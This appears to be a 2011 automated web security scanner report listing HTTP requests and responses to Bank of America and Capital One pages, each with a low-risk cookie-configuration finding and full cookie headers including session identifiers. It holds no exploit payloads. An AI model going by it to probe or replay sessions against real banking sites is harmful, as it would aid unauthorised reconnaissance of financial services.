GET /state.cgi HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/stateerror?referer= Connection: close Set-Cookie: BIGipServerngen-www.80=2814752427.20480.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /state.cgi?section=contact HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=3158750891.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; SMIDENTITY=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; GEOSERVER=1; cmTPSet=Y; CFID=131550827; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:05:55 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: cookiecheck=enabled; path=/; Location: http://www.bankofamerica.com/state.cgi?section=contact&update=&cookiecheck=yes Connection: close Set-Cookie: BIGipServerngen-www.80=432387755.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentbanking/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:54 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context= Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentbanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:46 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=studentchecking&destination=nba/studentbanking/index.cfm?template=stb_overview&context= Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /vehicle_and_personal_loans/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:58 GMT Content-type: magnus-internal/cold-fusion Location: http://www.bankofamerica.com/state.cgi?section=generic&destination=nba/vehicle_and_personal_loans/index.cfm?adlink=&context=&override_debug_mode=DEBUG&type= Connection: close Set-Cookie: BIGipServerngen-www.80=3869619883.20480.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
// Configurable throttle values. var throttle_percent_ngen = 100; var throttle_percent_olb = 100; var throttle_counter_active = false; var throttle_counter_percent = 0;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /retirementcenter HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/auto-loan-calculator.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 33970
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head> <title>Auto Payment and Other Auto Calculators - Capital One</title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/lp/auto-loans-pict.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 12533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Save time and m ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /autoloans/refinance/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24471
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bank/commercial/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:20 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 41880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:22 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:22 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 17136
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Home ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /banking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:12:01 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Location: http://www.capitalone.com/banking/personal/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /capitaloneplace/disclosures.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:43 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22852
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Im ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 35950
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /checking-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:02 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:01 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:28 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 28007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Contact Capital O ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contactus/faq.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:32 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:32 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One Frequ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
